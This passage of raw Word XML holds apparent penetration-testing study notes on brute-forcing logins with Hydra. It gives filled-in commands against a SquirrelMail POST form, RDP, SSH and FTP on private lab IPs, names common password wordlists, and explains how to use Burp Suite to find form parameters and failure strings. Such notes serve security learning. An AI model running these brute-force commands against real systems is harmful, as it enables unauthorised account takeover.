          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [insert machine IP] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http-post-form </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/squirrelmail/src/redirect.php:login_username=^USER^&amp;secretkey=^PASS^:incorrect" -t 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for one username and multiple passwords (password list)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it sees "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login failed. Invalid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" then it knows the password is invalid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L [insert username list] -P [insert password list] -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [insert machine IP] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http-post-form </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/squirrelmail/src/redirect.php:login_username=^USER^&amp;secretkey=^PASS^:incorrect" -t 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for multiple usernames and multiple passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The http-post-form is for POST requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You might sometimes need to add in a cookie. For example, if you intercept a request and you see the words "__VIEWSTATE", then you will want to add that into your hydra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a colon to the end of the end of the URL endpoint, and then past that cookie in, and then add a colon to the end of the cookie and add the failure message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/squirrelmail/src/redirect.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the endpoint where you send the POST requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Don't just look at the URL. Test a random example, intercept using burp suite, and on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">top</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you will see something like "/squirrelmail/src/redirect.php". Because on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">log in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page, the URL will be like "/squirrelmail/src/login.php", which is wrong. So, use burp suite to find correct endpoint for log in. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To find the proper parameter names for username and password, use Burpsuite and intercept a request again. On the bottom, you should see the parameters names. As above, we saw "login_username" and "secretkey"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: After the password, add ":incorrect", or replace incorrect with the correct error message. To find this, don't use BurpSuite, but just try a wrong username and password and then see what error pop up you get. Look for keywords like failure or incorrect or invalid, and then use whatever you see for this argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-t 20" is just specifying how many concurrent thread there should be, to speed it up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2zv4rbrfoa56" w:id="155"/>
      <w:bookmarkEnd w:id="155"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password lists</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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t xml:space="preserve">Some Password wordlists include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Passwords/500-worst-passwords.txt</w:t>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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lzodnmqkh3oc" w:id="156"/>
      <w:bookmarkEnd w:id="156"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other common Hydra services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDPL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rdp://192.168.50.202</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> RDP</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael -P /usr/share/wordlists/rockyou.txt -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh://192.168.171.142</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH (SSH Bruteforce)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try this short wordlist first since it takes less time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="218"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Passwords/500-worst-passwords.txt</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael -P /usr/share/wordlists/rockyou.txt -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp://192.168.237.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it includes a very interesting flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e nsr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">additional checks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stands for "try empty password / username as password / reverse login."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The letters after it tell Hydra which extra guesses to include. Specifically:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try null/empty password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
